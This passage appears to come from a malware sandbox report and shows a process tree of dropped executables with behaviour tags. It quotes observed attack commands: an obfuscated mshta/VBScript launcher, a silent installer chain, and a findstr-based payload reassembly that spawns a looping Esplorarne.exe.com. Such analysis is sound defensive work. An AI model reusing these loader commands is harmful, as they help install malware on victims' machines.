                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                PID:4984
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7220737.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7220737.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                              PID:3068
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5999348.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5999348.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:5316
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\8564441.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\8564441.exe"
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:1192
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 2472
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:5948
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\lTX93Zc5wuwjitywE6X5LzJ0.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\lTX93Zc5wuwjitywE6X5LzJ0.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                PID:4368
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\lTX93Zc5wuwjitywE6X5LzJ0.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\lTX93Zc5wuwjitywE6X5LzJ0.exe
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                    PID:6756
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 164
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                      PID:3512
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\iBO5jq99InSBV6e1Jgr6SYNw.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\iBO5jq99InSBV6e1Jgr6SYNw.exe"
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:2144
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 292
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                      PID:3480
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\DZEiGb9pH8qXTsKVQj27lk_Z.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\DZEiGb9pH8qXTsKVQj27lk_Z.exe"
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                    PID:1600
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\P1WHDLdyiGL0PFBoIO1CVT17.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\P1WHDLdyiGL0PFBoIO1CVT17.exe"
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:2856
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\P1WHDLdyiGL0PFBoIO1CVT17.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\P1WHDLdyiGL0PFBoIO1CVT17.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:6424
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\P1WHDLdyiGL0PFBoIO1CVT17.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\P1WHDLdyiGL0PFBoIO1CVT17.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                              PID:6348
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                taskkill -f -iM "P1WHDLdyiGL0PFBoIO1CVT17.exe"
                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                PID:6484
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\Y53w9YJ8aLTMn3P6Ia4v_kWB.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\Y53w9YJ8aLTMn3P6Ia4v_kWB.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                          PID:6292
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\kysL7JQB9CWXcGzMDlz2YZZq.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\kysL7JQB9CWXcGzMDlz2YZZq.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                            PID:6432
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6432 -s 280
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:5464
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\2UkKAAkauDkAicdnIEiYCQ9T.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\2UkKAAkauDkAicdnIEiYCQ9T.exe"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:6860
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-A9LAQ.tmp\2UkKAAkauDkAicdnIEiYCQ9T.tmp
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-A9LAQ.tmp\2UkKAAkauDkAicdnIEiYCQ9T.tmp" /SL5="$104EC,138429,56832,C:\Users\Admin\Documents\2UkKAAkauDkAicdnIEiYCQ9T.exe"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                PID:5524
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-7SI2M.tmp\Setup.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-7SI2M.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                    PID:6600
                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                                                                                      PID:6940
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629319901 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                          PID:3280
                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\QUercpbk797yIC2wwClGRYEt.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\QUercpbk797yIC2wwClGRYEt.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                  PID:5032
                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:1144
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpA086_tmp.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\tmpA086_tmp.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:6360
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                        PID:6208
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                          PID:6808
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            cmd
                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                              PID:6944
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                  PID:2972
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                  Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                  PID:1188
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                    PID:5608
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                      PID:5764
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                        PID:5884
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                          PID:4980
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                            PID:5948
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                              PID:2440
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                PID:1456
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                                                                                                                    PID:2968
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                      PID:6188
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                        PID:2968
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                          20⤵
                                                                                                                                                                                                                                                                                                                            PID:5204
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                              PID:6920
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                PID:6944
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                  23⤵
                                                                                                                                                                                                                                                                                                                                    PID:5204
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                      PID:6272
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                        PID:6808
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                          PID:5704
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                            PID:5572
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                              PID:2164
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                29⤵
                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                PID:6220
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                  30⤵
                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                                  PID:1580
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                    31⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5708
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                        32⤵
                                                                                                                                                                                                                                                                                                                                                          PID:3940
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                            33⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1484
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                34⤵
                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                PID:3824
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                  35⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:5360
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                      36⤵
                                                                                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                      PID:5208
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                        37⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:6116
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                            38⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6788
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                39⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1164
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                    40⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:4772
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                        41⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4516
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                            42⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                            PID:6884
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                              43⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1708
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                  44⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:4876
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                              ping YJTUIPJF -n 30
                                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                              PID:5132
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\knE_Wbovx1IZO4HXr40ZNDzp.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\knE_Wbovx1IZO4HXr40ZNDzp.exe"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                PID:3668
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\knE_Wbovx1IZO4HXr40ZNDzp.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\knE_Wbovx1IZO4HXr40ZNDzp.exe" -q
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  PID:2284
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\CtQLBJVPADCHzyqg8puGpEka.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\CtQLBJVPADCHzyqg8puGpEka.exe"
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                PID:2468
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 276
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                  PID:1176
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\System32\sihclient.exe /cv vnVNiR9qBUq3TT7auzp9Qw.0.2
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:4304
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
